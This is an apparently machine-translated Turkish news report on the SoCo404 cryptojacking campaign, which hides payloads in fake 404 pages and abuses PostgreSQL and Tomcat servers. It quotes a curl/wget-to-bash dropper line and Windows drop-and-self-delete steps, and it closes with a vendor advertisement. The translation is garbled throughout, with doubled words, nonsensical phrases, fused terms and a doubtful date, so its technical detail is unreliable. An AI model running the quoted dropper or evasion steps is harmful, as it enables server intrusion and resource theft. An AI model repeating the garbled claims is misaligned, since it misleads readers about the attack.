Yeni bir kriptaj saldırısı dalgası dalgası, “SoCo404” olarak adlandırılan geçmiş savunucuları geçmiş savunucuları gizlemek için mütevazi 404 hata sayfasını kullanıyor, kampanya, Google sitelerinde barındırılan ve tehlikeli TOMCAT sunucularında barındırılan görünüşte zararsız hata ekranları içine yerleştiriyor, daha sonra bunları hem linux hem de Windows hosts’da patlatıyor.
Kötü niyetli içerik normal HTML etiketleri arasında sıkıştığından, geleneksel URL filtreleme ve statik tarayıcılar, CPU döngüleri gizemli bir şekilde ortadan kalkana kadar tehdidi kaçırır.
Operasyon ilk olarak 2015’in ortalarında ortaya çıktı, ancak müfettişler bunun zayıf Tomcat kimlik bilgilerini ve atsız Atlassian Confluence örneklerini avlayan daha önceki madenci botlarının bir evrimi olduğuna inanıyorlar.
Wiz.io araştırmacıları, bulut kiracılarının yaklaşık üçte birinin internete açık bıraktığı bir hizmet olan halka açık PostgreSQL veritabanlarından kaynaklanan anormal kabuk aktivitesini izlerken en son varyantı belirlediler.
İçeri girdikten sonra, saldırganlar PostgreSQL’leri silahlandırıyor COPY FROM PROGRAM Rasgele komutlar çalıştırmak, karma OS siteleri boyunca yanal olarak döndürmek ve taze madencileri ölçekte döndürme özelliği.
Yanlış yapılandırılmış veritabanlarının ötesinde, düşman, güvenilir altyapı olarak maskelenmek için zaten sahip olduğu web sunucularını kötüye kullanıyor. Meyvadan ihmal edilen Kore nakliye alanları Linux Droppers’ı teslim eder (soco.sh) ve Windows yükleyicileri (ok.exe) adli tıp engellemek için kendilerini hemen siliyor.
Kötü amaçlı yazılım ailesinin her dalı kendini meşru süreçler olarak gizler –sd-pam– kworker/R-rcu_pveya rastgele sekiz karakterli Windows hizmetleri-CRON işlerini ve kabuk init kancalarını planlarken veya göz önünde bulundurulmamış Windows olay günlüğünü devre dışı bırakma.
Kurumsal gösterge tabloları, güç faturalarında kademeli bir artış ve performansta bir düşüşten başka bir şey kaydetmez.
HTML-Makyajlı 404 sayfa ile enfeksiyon
SOCO404’ün Kalbi Dağıtım Zinciri, sahte bir hata sayfası getiren bir yükleyicidir. https://www.fastsoco.top/1.
.webp)
Özel işaretleyiciler arasında gizli exe101 Ve exe101 Yükleyicinin doğrudan belleğe kodladığı ve disk tabanlı tarayıcıların atladığı bir baz64 blobu yatar.
Linux’ta, ilk komut aşağıdaki tek astara benziyor:-
sh -c "(curl http://:8080/soco.sh||wget -q -O- http://:8080/soco.sh)|bash"Komut dosyası rastgele bir dosya adı oluşturur, rakip madencileri öldürür, mendil /var/log/wtmpve kök olarak çalışıyorsanız, Ryzen veya Intel CPU’lar için Modele özgü kayıtları silikondan sıkmak için modele özgü kayıtları sağlar ve ayarlar.
Bir Go-Lang saplaması, daha sonra kendini yeniden yürütür cpuhp/1404 ev sahibine ev sahipliği yapan telefonlar ve havuzlara karşı bir Xmrig işçisi başlattı c3pool Ve moneroocean Cüzdan Kullanma 8BmVXb…eyZ.
Windows ana bilgisayarları paralel bir yol izler: certutil– Invoke-WebRequestveya curl damla ok.exe içine C:\Users\Public\yumurtlar conhost.exeana madenciyi enjekte eder ve orijinal dosyayı üç saniyeden sonra sessizce siler choice gecikme.
Her iki şube de esneklik için yerel soketler üzerinde konuşur ve öldürülürse bekçi iş parçacıklarını yeniden doğmaya hazır tutun, sahte hata sayfasının 404 mesajın görünmesinden uzun süre sonra paraları hasat etmesini sağlar.
Gerçek zamanlı sanal alan analizi ile daha hızlı, daha doğru kimlik avı tespiti ve işletmeniz için gelişmiş koruma deneyimi-> Herhangi birini deneyin. Şimdi